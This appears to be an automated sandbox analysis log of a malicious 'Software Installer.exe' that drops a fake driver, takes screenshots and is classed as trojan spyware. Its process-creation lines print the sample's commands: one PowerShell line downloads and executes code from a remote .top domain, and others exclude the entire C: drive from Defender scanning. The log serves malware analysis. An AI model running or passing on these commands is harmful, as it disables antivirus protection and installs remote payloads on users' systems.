Source: Software Installer.exe, 00000000.00000002.2648012640.00000196DE210000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652996729.000001D775210000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654538768.000001D777A21000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654629650.000001D777A61000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2648087403.00000196DE281000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653368487.000001D776D60000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655625974.000001D778160000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652407174.000001D775011000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654964425.000001D777C50000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653250976.000001D776D00000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NetworkInformation.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653928289.000001D777580000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Json.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2648034270.00000196DE220000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647707848.00000196DC8A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655043542.000001D777CC0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647991281.00000196DE1F0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653023838.000001D775240000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649696226.000001D7732B1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654880930.000001D777BE0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Software Installer.exe
Source: Process Memory Space: powershell.exe PID: 7064, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft_Driver_vs_2019.exe.0.drStatic PE information: Section: .bss ZLIB complexity 1.0003231990014265
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/13@4/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00444300 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,13_2_00444300
Source: C:\Users\user\Desktop\Software Installer.exeFile created: C:\Users\user\Microsoft_Driver_vs_2019.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1424:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1652:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Users\user\Desktop\Software Installer.exeFile created: C:\Users\user\AppData\Local\Temp\2025-03-14-14-43-35-screenshot.pngJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Software Installer.exeString found in binary or memory: requests-started
Source: Software Installer.exeString found in binary or memory: requests-started-rate
Source: unknownProcess created: C:\Users\user\Desktop\Software Installer.exe "C:\Users\user\Desktop\Software Installer.exe"
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Users\user\Microsoft_Driver_vs_2019.exe "C:\Users\user\Microsoft_Driver_vs_2019.exe"
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex"Jump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Users\user\Microsoft_Driver_vs_2019.exe "C:\Users\user\Microsoft_Driver_vs_2019.exe"Jump to behavior
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: icu.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: wshunix.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
